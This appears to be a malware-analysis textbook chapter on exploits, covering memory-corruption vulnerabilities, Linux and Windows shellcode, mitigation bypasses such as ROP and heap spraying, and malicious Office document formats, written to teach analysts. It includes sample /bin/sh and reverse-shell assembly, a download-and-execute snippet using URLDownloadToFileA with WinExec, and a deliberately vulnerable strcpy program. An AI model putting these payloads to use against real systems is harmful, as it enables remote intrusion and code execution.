At this stage, we are already aware of the different types of malware. What is common among most of them is that they are standalone and can be executed on their own once they reach the targeted system. However, this is not always the case, and some of them are only designed to work properly with the help of targeted legitimate applications.
In our everyday life, we interact with multiple software products that serve various purposes, from showing us pictures of cats to managing nuclear power plants. Thus, there is a specific category of threats that aim to leverage vulnerabilities hidden in such software to achieve their purposes, whether it is to penetrate the system, escalate privileges, or crash the target application or system to disrupt some important process.
In this chapter, we will be talking about exploits and learning how to analyze them. To that end, we will cover the following topics:
In this section, we will cover what major categories of vulnerabilities and exploits exist and how they are related to each other. We will explain how an attacker can take advantage of a bug (or multiple bugs) to take control of the application (or maybe the whole system) by performing unauthorized actions in its context.
A vulnerability is a bug or weakness inside an application that can be exploited or abused by an attacker to perform unauthorized actions. There are various types of vulnerabilities, most of which are caused by insecure coding practices and mistakes. You should pay attention when processing any input controlled by the end user, including environment variables and dependency modules. In this section, we will explore the most common cases and learn how attackers can leverage them.
The stack overflow vulnerability is one of the most common vulnerabilities and the one that is generally addressed first by exploit mitigation technologies. Its risk has been reduced in recent years thanks to new improvements such as the introduction of the Data Execution Prevention/No Execute (DEP/NX) technique, which will be covered in greater detail in the Exploring bypasses for exploit mitigation technologies section. However, under certain circumstances, it can still be successfully exploited or at least used to perform a Denial of Service (DoS) attack.
Let’s take a look at the following simple application written in C:
int vulnerable(char *arg) { char Buffer[80]; strcpy(Buffer, arg); return 0; } int main (int argc, char *argv[]) { // the command line argument vulnerable(argv[1]); }
As you know, the space for the Buffer[80] variable (as any local variable) is allocated on the stack, followed by the EBP register’s value, which is pushed at the beginning of the function prologue, and the return address:
Figure 8.1 – Local variable representations in the stack
So, by simply passing an argument to this application that’s longer than 80 bytes, the attacker can overwrite all the buffer space, as well as the EBP and the return address. It can take control of the address from which this application will continue executing after the vulnerable function finishes. The following diagram demonstrates overwriting Buffer[80] and the return address with shellcode:
Figure 8.2 – Overwriting Buffer[80] and the return address with shellcode
This is the most basic stack overflow vulnerability. Now, let’s look at other common types of vulnerabilities, such as heap overflow.
In this case, instead of using the stack, the affected variable would be stored in a dynamically allocated space in memory called the heap. This memory allocation can be done using malloc, HeapAlloc, or other similar APIs. Windows supports two types of heaps: the default one and the private (that is, dynamic) one(s); all of them follow the _HEAP structure. The default heap’s address is stored in the PEB structure in the ProcessHeap field and can be obtained by calling the GetProcessHeap API; private ones are returned by APIs such as HeapCreate when they are created. All heap addresses (including the default one) are stored in a list that’s pointed to by the ProcessHeaps field of PEB.
Unlike the stack, the heap doesn’t store return addresses to make it easily exploitable, but there are other ways to abuse it. To understand them, first, we need to learn some basics about the heap structure. The data that’s used by the application is stored in heap chunks. Chunks are stored within heap segments that start with a _HEAP_SEGMENT structure and are pointed to in the _HEAP structure. All heap chunks contain a header (the _HEAP_ENTRY structure) and the actual data. However, when the chunk is stored as freed, following the _HEAP_ENTRY structure, it contains a linked list structure, _LIST_ENTRY, that interconnects free chunks. This structure consists of pointers to the previous free chunk (the BLink field) and the next free chunk (the FLink field); the first and the last free chunks in a list are pointed to by the FreeList field of the _HEAP structure. When the system needs to remove a freed chunk from this list (for example, when the chunk is allocated again or as part of the chunk consolidation process), unlinking will take place. It involves writing the next item’s address in the previous item’s next entry, and the previous item’s address in the next item’s previous entry to remove the chunk from a list. The corresponding code will look like this:
Figure 8.3 – Sample code for the unlinking process
By overflowing the variable stored on the heap, the attacker may be able to overwrite the FLink and BLink values of the adjacent chunk, which would make it possible to write anything at any address during the unlinking step, as shown in the preceding screenshot. For example, this can be used to overwrite the address of some existing function that’s guaranteed to be executed with an address of the shellcode to achieve its execution.
Multiple mitigations have been introduced over time to combat this technique. Starting from Windows XP SP2, because of additional checks being introduced, attackers had to switch from abusing FreeList to the Lookaside list for a similar purpose. Starting from Windows Vista, among other changes, the Lookaside list was replaced with a Low Fragmentation Heap (LFH) approach and the chunk headers started to be XORed with the Encoding field value, forcing attackers to explore different techniques such as overwriting the _HEAP structure. In Windows 8, Microsoft engineers introduced additional checks and limitations to fight this approach – and this battle is still ongoing.
This type of vulnerability is still widely used, despite all the exploit mitigations that were introduced in the later versions of Windows. These vulnerabilities are common in scripting languages such as JavaScript in browsers or PDF files.
This vulnerability occurs when an object (a structure in memory, which we will cover in detail in the next chapter) is still being referenced after it has been freed. Imagine that the code looks something like this:
OBJECT Buf = malloc(sizeof(OBJECT)); Buf->address_to_a_func = IsAdmin(); free(Buf); .... <some code> .... // execute this function after the buffer was freed (Buf->address_to_a_func)();
In the preceding code, Buf contains the address of the IsAdmin function, which was executed later, after the whole Buf variable was freed in memory. Do you think address_to_a_func will still be pointing to IsAdmin? Maybe, but if this area was reallocated in memory with another variable controlled by the attacker, they can set the value of address_to_a_func to the address of their choice. As a result, this could allow the attacker to execute their shellcode and take control of the system.
In object-oriented programming (OOP), it’s common to see variables (or objects) that have an array of functions being executed. These are known as vtable arrays. When a vtable array is overwritten and any function inside this table is called, the attackers can redirect the execution to their shellcode.
As we know, integer values can take 1, 2, 4, or 8 bytes. Regardless of how much size was granted to store them, there are always some numbers that are big enough to not fit there. The integer overflow vulnerability happens when the attacker is allowed to introduce a number outside of the range supported by the data unit intended to store it. An example would be making a byte-sized variable storing an unsigned integer, 256 (100000000b), which will result in storing 0 (00000000b) as only the last 8 bits would fit into a byte. This may lead to unexpected behavior in the program in favor of the attacker, such as allocating a buffer whose length is 0 and then writing the data outside of its scope.
A logical vulnerability is a vulnerability that doesn’t require memory corruption to be executed. Instead, it abuses the application logic to perform unintended actions. A good example of this is CVE-2010-2729 (MS10-061), named Windows Print Spooler Service Vulnerability, which is used by the Stuxnet malware. Let’s dig deeper into how it works.
Windows printing APIs allow the user to choose the directory that they wish to copy the file to be printed to. So, with an API named GetSpoolFileHandle, the attacker can get the file handle of the newly created file on the target machine and then easily write any data there with the WriteFile (or similar) API. A vulnerability like this one targets the application logic, which allows the attacker to choose the directory they wish and provides them with a file handle to overwrite this file with any data they want.
Different logical vulnerabilities are possible, and there is no specific format for them. This is why there is no universal mitigation for these types of vulnerabilities. However, they are still relatively rare compared to memory corruption ones as they are harder to find and not all of them lead to arbitrary code execution.
There are other types of vulnerabilities out there, but the types that we have just covered are a cornerstone of other types of vulnerabilities you may witness.
Now that we have covered how the attacker can force the application to execute its code, let’s take a look at how this code is written and what challenges the attacker faces when writing it.
Generally speaking, an exploit is a piece of code or data that takes advantage of a bug in software to perform an unintended behavior. There are several ways exploits can be classified. First of all, apart from the vulnerability that they target, when we talk about exploits, it is vitally important to figure out the actual result of the action being performed. Here are some of the most common types:
Depending on the location where the exploit communicates with the targeted software, it is possible to distinguish between the following groups:
Finally, if the exploit targets a vulnerability that hasn’t been officially addressed and fixed yet, it is known as a zero-day exploit.
Now, it is time to deep dive into various aspects of shellcode.
In this section, we will take a look at the code that gets executed by the attacker during vulnerability exploitation. This code gets executed in very special conditions without headers and known memory addresses. Let’s learn what shellcode is and how it’s written for Linux (Intel and ARM processors) and, later, the Windows operating system.
Shellcode is a list of carefully crafted instructions that can be executed once code has been injected into a running application. Due to most of the exploit’s circumstances, the shellcode must be position-independent code (which means it doesn’t need to run in a specific place in memory or require a base relocation table to fix its addresses). Shellcode also has to operate without an executable header or a system loader. For some exploits, it can’t include certain bytes (especially null for the overflows of the string-type buffers).
Now, let’s take a look at what shellcode looks like in Windows and Linux.
Linux shellcode is generally arranged much simpler than Windows shellcode. Once the program counter register is pointing to the shellcode, the shellcode can execute consecutive system calls to spawn a shell, listen on a port, or connect back to the attacker with minimal effort (check out Chapter 11, Dissecting Linux and IoT Malware, for more information about system calls in Linux). The main challenges that attackers face are as follows:
Now, let’s learn how it is possible to overcome these challenges. After this, we will look at different types of shellcode.
This is a relatively easy task. Here, the shellcode abuses the call instruction, which saves the absolute return address in the stack (which the shellcode can get using the pop instruction).
An example of this is as follows:
call next_ins next_ins: pop eax ; now eax stores the absolute address of next_ins
After getting the absolute address, the shellcode can get the address of any data inside the shellcode, like so:
call next_ins next_ins: pop eax ; now eax has the absolute address of next_ins add eax, <data_sec – next_ins> ; now, eax stores the address of the data section data_sec: db 'Hello, World',0
Another common way to get the absolute address is by using the fstenv FPU instruction. This instruction saves some parameters related to the FPU for debugging purposes, including the absolute address of the last executed FPU instruction. This instruction can be used like this:
_start: fldz fstenv [esp-0xc] pop eax add eax, <data_sec – _start> data_sec: db 'Hello, World', 0
As you can see, the shellcode was able to obtain the absolute address of the last executed FPU instruction, fldz, or in this case the address of _start, which can help in obtaining the address of any required data or a string in the shellcode.
Null-free shellcode is a type of shellcode that has to avoid any null byte to be able to fit a null-terminated string buffer. The authors of this shellcode have to change the way they write their code. Let’s take a look at an example.
For the call/pop approach that we described earlier, they will be assembled into the following bytes:
Figure 8.4 – call/pop in OllyDbg
As you can see, because of the relative addresses the call instruction uses, it produced 4 null bytes. For the shellcode authors to handle this, they need the relative address to be negative. It could work in a case like this:
Figure 8.5 – call/pop in OllyDbg with no null bytes
Here are some other examples of the changes the malware authors can make to avoid null bytes:
As you can see, it’s not very hard to do this in shellcode. You will notice that most of the shellcode from different exploits (or even the shellcode in Metasploit) is null-free by design, even if the exploit doesn’t necessarily require it.
Let’s start with a simple example that spawns a shell:
jmp _end _start: xor ecx, ecx xor eax, eax pop ebx ; load /bin/sh in ebx mov al, 11 ; execve syscall ID xor ecx, ecx ; no arguments in ecx int 0x80 ; syscall mov al, 1 ; exit syscall ID xor ebx,ebx ; no errors int 0x80 ; syscall _end: call _start db '/bin/sh',0
Let’s take a closer look at this code:
int execve(const char *filename, char *const argv[], char
*const envp[]);
void _exit(int status);
In this example, you have seen how shellcode can give attackers a shell by launching /bin/sh. For the x64 version, there are a few differences:
The code will look like this:
xor rdx, rdx
push rdx ; null bytes after the /bin/sh
mov rax, 0x68732f2f6e69622f ; /bin/sh
push rax
mov rdi, rsp
push rdx ; null arguments for /bin/sh
push rdi
mov rsi, rsp
xor rax, rax
mov al, 0x3b ; execve system call
syscall
xor rdi, rdi
mov rax, 0x3c ; exit system call
syscall
As you can see, there are no big differences between x86 and x64 when it comes to the shellcode. Now, let’s take a look at more advanced types of shellcode.
The reverse shell shellcode is one of the most widely used types of shellcode. This shellcode connects to the attacker and provides them with a shell on the remote system to gain full access to the remote machine. For this to happen, the shellcode needs to follow these steps:
You will usually see it being used like this:
socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
Here, AF_INET represents most of the known internet protocols, including IPPROTO_IP for the IP protocol. SOCK_STREAM is used to represent TCP communication. From this system call, you can understand that this shellcode is communicating with the attacker through TCP. The assembly code looks like this:
xor edx, edx ; cleanup edx
push edx ; protocol=IPPROTO_IP (0x0)
push 0x1 ; socket_type=SOCK_STREAM (0x1)
push 0x2 ; socket_family=AF_INET (0x2)
mov ecx, esp ; pointer to socket() args
xor ebx, ebx
mov bl, 0x1 ; SYS_SOCKET
xor eax,eax
mov al, 0x66 ; socketcall syscall ID
int 0x80
xchg edx, eax ; edx=sockfd (the returned socket)
Here, the shellcode uses the socketcall system call (with ID 0x66). This system call represents many system calls, including socket, connect, listen, bind, and so on. In ebx, the shellcode sets the function it wants to execute from the socketcall list. Here is a snippet of the list of functions supported by socketcall:
SYS_SOCKET 1
SYS_BIND 2
SYS_CONNECT 3
SYS_LISTEN 4
SYS_ACCEPT 5
The shellcode pushes the arguments to the stack and then sets ecx to point to the list of arguments, sets ebx = 1 (SYS_SOCKET), sets the system call ID in eax (socketcall), and then executes the system call.
int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
The assembly code will look as follows:
push 0x0101017f ; sin_addr=127.1.1.1 (network byte order)
xor ecx, ecx
mov cx, 0x3905
push cx ; sin_port=1337 (network byte order)
inc ebx
push bx ; sin_family=AF_INET (0x2)
mov ecx, esp ; save pointer to sockaddr struct
push 0x10 ; addrlen=16
push ecx ; pointer to sockaddr
push edx ; sockfd
mov ecx, esp ; save pointer to sockaddr_in struct
inc ebx ; sys_connect (0x3)
int 0x80 ; exec sys_connect
push 0x2
pop ecx ; set loop counter
xchg ebx, edx ; save sockfd
; loop through three sys_dup2 calls to redirect stdin(0), stdout(1) and stderr(2)
loop:
mov al, 0x3f ; sys_dup2 systemcall ID
int 0x80
dec ecx ; decrement loop-counter
jns loop ; as long as SF is not set -> continue
In the preceding code, the shellcode overwrites stdin (0), stdout (1), and stderr (2) with sockfd (the socket handle) to redirect any input, output, and errors to the attacker, respectively.
Now that you have seen more advanced shellcode, you can understand most of the well-known shellcode and the methodology behind them. For binding a shell or downloading and executing shellcode, the code is very similar, and it uses similar system calls and maybe one or two extra functions. You will need to check the definition of every system call and what arguments it takes before analyzing the shellcode based on that.
That’s it for x86 (both 32-bit and 64-bit). Now, let’s take a quick look at ARM shellcoding and the differences between it and x86.
The shellcode on ARM systems is very similar to the shellcode that uses the x86 instruction set. It’s even easier for the shellcode authors to write in ARM as they don’t have to use the call/pop technique or fstenv to get the absolute address. In ARM assembly language, you can access the program counter register (pc) directly from the code, which makes this even simpler. Instead of int 0x80 or syscall, the shellcode uses svc #0 or svc #1 to execute a system function. An example of ARM shellcode for executing a local shell is as follows:
_start: add r0, pc, #12 mov r1, #0 mov r2, #0 mov r7, #11 ; execve system call ID svc #1 .ascii "/bin/sh "
In the preceding code, the shellcode sets r0 with the program counter (pc) + 12 to point to the /bin/sh string. Then, it sets the remaining arguments for the execve system call and calls the svc instruction to execute the code.
ARM instructions are usually 32-bit instructions. However, many shellcodes switch to Thumb Mode, which sets the instructions to be 16 bits only and reduces the chances of having null bytes. For the shellcode to switch to Thumb Mode, it is common to use the BX or BLX instructions.
After executing it, all instructions switch to the 16-bit mode, which reduces null bytes significantly. By using svc #1 instead of svc #0 and avoiding immediate null values and instructions that include null bytes, the shellcode can reach the null-free goal.
When analyzing ARM shellcode, make sure that you disassemble all the instructions after the mode switches to 16-bit rather than 32-bit.
Now that we have covered Linux shellcode for Intel and ARM processors, let’s take a look at Windows shellcode.
Windows shellcode is more complicated than its Linux counterpart. In Windows, you can’t directly use sysenter or interrupts like in Linux as the system function IDs change from one version to another. Windows provides interfaces to access their functionality in libraries, such as kernel32.dll. Windows shellcode has to find the base address of kernel32.dll and go through its export table to get the required APIs to implement their functionality. In terms of socket APIs, attackers may need to load additional DLLs using LoadLibraryA/LoadLibraryExA.
Windows shellcode follows these steps to achieve its target:
Now that we’ve covered how shellcode gets its absolute address, let’s look at how it gets the base address of kernel32.dll.
kernel32.dll is the main DLL that’s used by shellcode. It has APIs such as LoadLibrary, which allows you to load other libraries, and GetProcAddress, which gets the address of any API inside a library that’s loaded in memory.
To access any API inside any DLL, the shellcode must get the address of kernel32.dll and parse its export table.When an application is being loaded into memory, the Windows OS loads its core libraries, such as kernel32.dll and ntdll.dll, and saves the addresses and other information about these libraries inside the Process Environment Block (PEB). The shellcode can retrieve the address of kernel32.dll from the PEB as follows (for 32-bit systems):
mov eax,dword ptr fs:[30h] mov eax,dword ptr [eax+0Ch] mov ebx,dword ptr [eax+1Ch] mov ebx,dword ptr [ebx] mov esi,dword ptr [ebx+8h]
The first line gets the PEB address from the FS segment register (in x64, it will be the GS register and a different offset). Then, the second and the third lines get PEB->LoaderData->InInitializationOrderModuleList.
InInitializationOrderModuleList is a DLL that contains information about all the loaded modules (PE files) in memory (such as kernel32.dll, ntdll.dll, and the application itself), along with the base address, the filename, and other information.
The first entry that you will see in InInitializationOrderModuleList is ntdll.dll. To get kernel32.dll, the shellcode must go to the next item in the list. So, in the fourth line, the shellcode gets the next item while following the forward link (ListEntry->FLink). It gets the base address from the available information about the DLL in the fifth line.
For the shellcode to be able to access the APIs of kernel32.dll, it should parse its export table. The export table consists of three arrays. The first array is AddressOfNames, which contains the names of the APIs inside the DLL file. The second array is AddressOfFunctions, which contains the relative addresses (RVAs) of all of these APIs:
Figure 8.6 – Export table structure (the numbers are not real and have been provided as an example)
However, the issue here is that these two arrays are aligned with a different alignment. For example, GetProcAddress could be in the third item in AddressOfNames, but it’s in the fifth item in AddressOfFunctions.
To handle this issue, Windows created a third array named AddressOfNameOrdinals. This array has the same alignment as AddressOfNames and contains the index of every item in AddressOfFunctions. Note that AddressOfFunctions and AddressOfNameOrdinals have more items than AddressOfNames since not all APIs have names. The APIs without equivalent names are accessed using their ID (their index, in AddressOfNameOrdinals). The export table will look something like this:
Figure 8.7 – Export table parser (the winSRDF project)
For the shellcode to get the addresses of its required APIs, it should search for the required API’s name in AddressOfNames and then take the index of it and search for that index in AddressOfNameOrdinals to find the equivalent index of this API in AddressOfFunctions. By doing this, it will be able to get the relative address of that API. The shellcode adds them to the base address of kernel32.dll so that it has the full address to this API. In most cases, instead of matching the API names against strings that it would need to hardcode within itself, the shellcode generally uses its hashes (more information can be found in Chapter 6, Bypassing Anti-Reverse Engineering Techniques).
This shellcode uses an API located in urlmon.dll called URLDownloadToFileA. As its name suggests, it downloads a file from a given URL and saves it to the hard disk when it’s provided with the required path. The definition of this API is as follows:
URLDownloadToFile(LPUNKNOWN pCaller, LPCTSTR szURL, LPCTSTR szFileName, _Reserved_ DWORD dwReserved, LPBINDSTATUSCALLBACK lpfnCB);
Only szURL and szFilename are required. The remaining arguments are mostly set to null. After the file is downloaded, the shellcode executes this file using CreateProcessA, WinExec, or ShellExecute. The C code for this may look as follows:
URLDownloadToFileA(0,"https://localhost:4444/calc.exe","calc.exe",0,0); WinExec("calc.exe",SW_HIDE);
As you can see, the payload is very simple and yet very effective in executing the second stage of the attack, which could be the backdoor that maintains persistence and can communicate to the attacker and exfiltrate valuable information.
Now that we have learned about what exploits look like and how they work, let’s summarize some practical tips and tricks for their analysis.
Firstly, you need to carefully collect any prior knowledge: what environment the exploit was found in, whether it is already known what software was targeted and its version, and whether the exploit triggered successfully there. All this information will allow you to properly emulate the testing environment and successfully reproduce the expected behavior, which is very helpful for dynamic analysis.
Secondly, it is important to confirm how it interacts with the targeted application. Usually, exploits are delivered through the expected input channel (whether it is a listening socket, a web form or URI, or maybe a malformed document, a configuration file, or a JavaScript script), but other overlooked options are also possible (for example, environment variables and dependency modules). The next step here is to use this information to successfully reproduce the exploitation process and identify the indicators that can confirm it. Examples include the target application crashing in a particular way or performing particular actions that can be seen using suitable system monitors (for example, the ones that keep track of file, registry, or network operations or accessed APIs). If shellcode is involved, its analysis may give valuable information about the expected after-exploitation behavior.
After this, you need to identify the targeted vulnerability. The MITRE Corporation maintains a list of all publicly known vulnerabilities by assigning the corresponding Common Vulnerabilities and Exposures (CVE) identifiers to them so that they can easily be referenced (for example, CVE-2018-9206). Sometimes, it may be already known from antivirus detection or publications, but it is always advisable to confirm it in any case.
Check for unique strings first as they may give you a clue about the parts of the targeted software it interacts with. Unlike most other types of malware, static analysis may not be enough in this case. Since exploits work closely with the targeted software, they should be analyzed in their context, which in many cases requires dynamic analysis.
Here, you need to intercept the moment the exploit is delivered but hasn’t been processed yet using a debugger of preference. After this, there are multiple ways the analysis can be continued. One approach is to carefully go through the functions that are responsible for it being processed at a high level (without stepping into each function) and monitor the moment when it triggers. Once this happens, it becomes possible to narrow down the searching area and focus on the sub-functions of the identified function. Then, the engineer can repeat this process up until the moment the bug is found.
Another way to do this is to search for suspicious entries in the exploit itself first (such as corrupted fields, big binary blocks with high entropy, long lines with hex symbols, and so on) and monitor how the targeted software processes them. If shellcode is involved, it is possible to patch it with either breakpoint or infinite loop instructions at its beginning (xCC and xEBxFE, respectively), then perform steps to reproduce the exploitation, wait until the inserted instructions get executed, and check the stack trace to see what functions have been called to reach this point.
Overall, it is generally recommended to stick to the virtualized environment or emulation for dynamic analysis since in the case of exploits, it is much more probable that something may go wrong, and execution control will be lost. Therefore, it is convenient to be able to restore the previous debugging and environmental state.
These techniques are universal and can be applied to pretty much any type of exploit. Regardless of whether the engineer has to analyze browser exploits (often written in JavaScript) or some local privilege escalation code, the difference will mainly be in the setup for the testing environment.
If you need to analyze the binary shellcode, you can use a debugger for the targeted architecture and platform (such as OllyDbg for 32-bit Windows) by copying the hexadecimal representation of the shellcode and using the binary paste option. It is also possible to use tools such as unicorn, libemu (a small emulator library for x86 instructions), or the Pokas x86 Emulator, which is a part of the pySRDF project, to emulate shellcode. Other great tools useful for dynamic analysis are scdbg and qltool (part of the qiling framework).
Another popular solution is to convert it into an executable file. After this, you can analyze it both statically and dynamically, just like any usual malware sample. One option would be to use the shellcode2exe.py script, but unfortunately, one of its core dependencies is no longer supported, so it may be hard to set it up. Another option would be to compile the executable manually by copying and pasting the shellcode into the corresponding template:
unsigned char code[] = {<output of xxd –i against the shellcode>}; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) code; (int)(*func)(); }
The execution flag may need to be added to the data section to make the shellcode executable.
Finally, it is possible to just open any executable in the debugger and copy and paste the shellcode over the existing code. For example, in x64dbg, it can be done by right-clicking and going to Binary | Paste (Ignore Size).
For the ROP chain to be analyzed, you need to get access to the targeted application and the system so that the actual instructions can be resolved dynamically there.
Since the same types of vulnerabilities kept appearing, despite all the awareness and training for software developers on secure coding, new ways to reduce their impact and make them unusable for remote code execution have been introduced.
In particular, multiple exploit mitigation technologies were developed at various levels to make it hard to impossible for the attackers to successfully execute their shellcode. Let’s take a look at the most well-known mitigations that have been created for this purpose.
Data execution prevention is one of the earliest techniques that was introduced to protect against exploits and shellcode. The idea behind it is to stop the execution inside any memory page that doesn’t have EXECUTE permission. This technique can be supported by hardware that raises an exception once shellcode gets executed in the stack or in the heap (or any place in memory that doesn’t have this permission).
This technology didn’t completely stop the attackers from executing their payload and taking advantage of memory corruption vulnerabilities. They invented a new technique to bypass DEP/NX called return-oriented programming (ROP).
The main idea behind ROP is that rather than setting the return address so that it points to the shellcode, attackers can set the return address to redirect the execution to some existing code inside the program or any of its modules and chain instructions to reproduce a shellcode. The small snippets of misused code will look like this:
mov eax, 1
pop ebx
ret
For example, on Windows, the attacker can try to redirect the execution to the VirtualProtect API to change permissions for the part of the stack (or heap) that the shellcode is in and execute the shellcode. Alternatively, it is possible to use combinations such as VirtualAlloc and memcpy or WriteProcessMemory, HeapAlloc and any memory copy API, or the SetProcessDEPPolicy and NtSetInformationProcess APIs to disable DEP.
The trick here is to use the Import Address Table (IAT) of a module to get the address of any of these APIs so that the attacker can redirect the execution to the beginning of this API. In the ROP chain, the attacker places all the arguments that are required for each of these APIs, followed by a return to the API they want to execute. An example of this is as follows:
Figure 8.8 – The ROP chain for the CVE-2018-6892 exploit
Some ROP chains can execute the required payload without the need to return to the shellcode. There are automated tools that help the attacker search for these small code gadgets and construct the valid ROP chain. One of these tools is mona.py, which is a plugin for the Immunity Debugger.
As you can see, DEP alone doesn’t stop the attackers from executing their shellcode. However, along with address space layout randomization (ASLR), these two mitigation techniques make it hard for the attacker to successfully execute the payload. Let’s take a look at how ASLR works.
ASLR is a mitigation technique that is used by multiple operating systems, including Windows and Linux. The idea behind it is to randomize addresses where the application and the DLLs are loaded in the process memory. Instead of using predefined ImageBase values as base addresses, the system uses random addresses to make it very hard for the attackers to construct their ROP chains, which generally rely on the static addresses of instructions that comprise it.
Now, let’s take a look at some common ways to bypass it.
For ASLR to be effective, it is required to have the application and all its libraries compiled with an ASLR enabling flag, such as -fstack-protector or -pie -fPIE for the GCC compiler, which isn’t always possible. If there is at least one module that doesn’t support ASLR, it becomes possible for the attacker to find the required ROP gadgets there. This is especially true for tools that have lots of plugins written by third parties or applications that use lots of different libraries. While the base address of kernel32.dll is still randomized (so that the attacker can’t directly return to an API inside), it can easily be accessed from the import table of the loaded non-ASLR module(s).
In cases where all the libraries support ASLR, writing an exploit is much harder. The known technique for this is chaining multiple vulnerabilities. For example, one vulnerability will be responsible for information disclosure and another for memory corruption. The information disclosure vulnerability could leak an address of a module that helps reconstruct the ROP chain based on that address. The exploit could contain an ROP chain comprised of just RVAs (relative addresses without the base address values) and exploit the information disclosure vulnerability on the fly to leak the address and reconstruct the ROP chain to execute the shellcode. This type of exploit is more common in scripting languages, for example, targeting vulnerabilities that are exploited using JavaScript. Using the power of this scripting language, the attacker can construct the ROP chain on the target machine.
An example of this could be the local privilege escalation vulnerability known as CVE-2019-0859 in win32k.sys. The attacker uses a known technique for modern versions of Windows (this works on Windows 7, 8, and 10) called the HMValidateHandle technique. It uses an HMValidateHandle function that’s called by the IsMenu API, which is implemented in user32.dll. Given a handle of a window that has been created, this function returns the address of its memory object in the kernel memory, resulting in an information disclosure that could help in designing the exploit, as shown in the following screenshot:
Figure 8.9 – Kernel memory address leak using the HMValidateHandle technique
This technique works pretty well with stack-based overflow vulnerabilities. But for heap overflows or use-after-free, a new problem arises, which is that the location of the shellcode in the memory is unknown. In stack-based overflows, the shellcode resides in the stack, and it’s pointed to by the esp register, but in heap overflows, it is harder to predict where the shellcode will be. In this case, another technique called heap spraying is commonly used.
The idea behind this technique is to make multiple addresses lead to the shellcode by filling the memory of the application with lots of copies of it, which will lead to it being executed with a very high probability. The main problem here is guaranteeing that these addresses point to the start of it and not to the middle. This can be achieved by using some sort of shellcode padding. The most famous example involves having a huge amount of nop bytes (called nop slide, nop sled, or nop ramp), or any instructions that don’t have any major effect before the shellcode:
Figure 8.10 – The heap spray technique
As you can see, the attacker used the 0x0a0a0a0a address to point to its shellcode. Because of the heap spraying technique, this address, which has a relatively high probability, may point to the nop instructions in one of the shellcode blocks, which will later lead to the shellcode starting.
This technique is very similar to heap spraying, with the only difference being that block allocation is caused by abusing a Just-In-Time (JIT) compiler, which will also ensure that the produced memory blocks will have EXECUTE permissions as they are supposed to store generated assembly instructions. This way, DEP can be bypassed together with ASLR.
Several other mitigation techniques have been introduced to protect against exploitation. We will just mention a few of them:
That’s it for the most common mitigations. Now, let’s talk about other types of exploits.
While Microsoft Office is mainly associated with Windows by many people, it has also supported the macOS operating system for several decades. In addition, the file formats used by it are also understood by various other suites, such as Apache OpenOffice and LibreOffice. In this section, we will look at vulnerabilities that can be exploited by malformed documents to perform malicious actions and learn how to analyze them.
The first thing that should be clear when analyzing any exploit is how the files associated with them are structured. Let’s take a look at the most common file formats associated with Microsoft Office that are used by attackers to store and execute malicious code.
This is probably the most well-known file format that can be found in documents associated with various older and newer Microsoft Office products, such as .doc (Microsoft Word), .xls (Microsoft Excel), .ppt (Microsoft PowerPoint), and others. Once completely proprietary, it was later released to the public and now, its specification can be found online. Let’s go through some of the most important parts of it in terms of malware analysis.
The Compound File Binary (CFB) format, also known as OLE2, provides a filesystem-like structure for storing application-specific streams of data in sectors:
Figure 8.11 – OLE2 header parsed
Here is the structure of its header, which is stored at the beginning of the first sector:
Figure 8.12 – DIFAT array mentioning only one FAT sector with an ID of 0x2D
As you can see, it is possible to allocate memory using the usual sectors and mini stream that operates with sectors of smaller sizes:
Figure 8.13 – FAT sector storing information about sector chains
Figure 8.14 – MiniFAT sectors storing information about mini stream chains
As we mentioned previously, for each sector in a chain, the ID of the next sector is stored up until the last one that contains the ENDOFCHAIN (0xFFFFFFFE) value, and the header takes up a single usual sector with its values padded according to the sector’s size if necessary:
Figure 8.15 – Example of the sector chain following the header
There are several other auxiliary storage types, including the following:
Here, stream and storage objects are used in a similar way to files and directories in typical filesystems:
Figure 8.16 – Multiple streams within a single storage object
The root directory will be the first entry in the first sector of the directory chain; it behaves as both a stream and a storage object. It contains a pointer to the first sector that stores the mini stream:
Figure 8.17 – Root directory
In .xls files, the main Workbook stream follows the BIFF8 format. In .doc files, the WordDocument stream should start with the FIB structure.
Knowing how the files are structured allows reverse engineers to identify anomalies that can lead to unexpected behavior.
Now, let’s focus on Rich Text Format (RTF) documents.
RTF is another proprietary Microsoft format with a published specification that can be used to create documents. Originally, its syntax was influenced by the TeX language, which was mostly developed by Donald Knuth as it was intended to be cross-platform. The first reader and writer were released with the Microsoft Word product for Macintosh computers. Unlike the other document formats we’ve described, it is human-readable in usual text editors, without any preprocessing required.
Apart from the actual text, all RTF documents are implemented using the following elements:
Important Note
It is worth mentioning that if the fN part of it is not enforced, the RTF document will be considered valid by MS Office, even if it is absent or replaced with something else.
The embedded executable payloads are commonly stored in the following areas:
Figure 8.18 – Malicious executable stored in the document’s overlay
Apart from that, the remote malicious payload can be accessed using the objautlink control word. In addition, objupdate is commonly used to reload the object without the user’s interaction to achieve code execution.
In terms of obfuscation, multiple techniques exist for this, as follows:
Figure 8.19 – Malware using excessive in control words
Now, let’s talk about threats that follow the Office Open XML (OOXML) format.
OOXML format is associated with newer Microsoft Office products and is implemented in files with extensions that end with x, such as .docx, .xlsx, and .pptx. At the time of writing, this is the default format used by modern versions of Office.
In this case, all information is stored in Open Packaging Convention (OPC) packages, which are ZIP archives that follow a particular structure and store XML and other data, as well as the relationships between them.
Here is its basic structure:
Now that we’ve become familiar with the common document formats, it is time to learn how to analyze malware that utilizes them.
In this section, we are going to learn how malicious Microsoft Office documents can be analyzed. Here, we will focus on malware-exploiting vulnerabilities. Macro threats will be covered in Chapter 10, Scripts and Macros – Reversing, Deobfuscation, and Debugging, as they aren’t classed as exploits from a technical standpoint.
There are quite a few tools that allow analysts to look inside original Microsoft Office formats, as follows:
Regarding the newer Open XML-based files (such as .docx, .xlsx, and .pptx), officedissector, a parser library written in Python that was designed for securely analyzing OOXML files, can be used to automate certain tasks. But overall, once unzipped, they can always be analyzed in your favorite text editor with XML highlighting. Similarly, as we have already mentioned, RTF files don’t necessarily require any specific software and can be analyzed in pretty much any text editor.
When performing static analysis, it generally makes sense to extract macros first if they’re present, as well as check for the presence of other non-exploit-related techniques, such as DDE or PowerPoint actions (their analysis will be covered in Chapter 10, Scripts and Macros – Reversing, Deobfuscation, and Debugging). Then, you need to check whether any URLs or high-entropy blobs are present as they may indicate the presence of shellcode. Only after this does it make sense to dig into anomalies in the document structure that may indicate the presence of an exploit.
Dynamic analysis of these types of exploits can be performed in two stages:
